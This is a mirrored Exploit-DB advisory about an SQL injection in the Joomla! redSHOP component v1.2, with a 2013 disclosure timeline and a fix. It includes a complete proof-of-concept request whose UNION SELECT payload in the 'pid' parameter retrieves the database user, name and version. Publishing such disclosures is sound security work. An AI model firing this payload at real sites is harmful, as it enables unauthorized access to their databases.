bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/27532.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------
== Description ==
- Product: Joomla! redSHOP component
- Product link: http://redcomponent.com/redcomponent/redshop
- Vendor: redcomponent
- Affected versions: version 1.2 is vulnerable. Other versions might
be affected as well.
- Vulnerability discovered by: Matias Fontanini
== Vulnerability ==
When using the "addtocompare" task, the component does not correctly
sanitize the "pid" parameter before using it to construct SQL queries,
making it vulnerable to SQL Injection attacks.
The following proof of concept request retrieves the database user,
name and version:
http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
== Solution ==
Upgrade the product to the 1.3 version.
== Report timeline ==
[2013-08-02] Vulnerability reported to vendor.
[2013-08-02] Developers answered back indicating that an update would
be released soon.
[2013-08-06] redSHOP 1.3 was released, which fixes the reported issue.
[2013-08-08] Public disclosure.
Reference in a new issue View git blame Copy permalink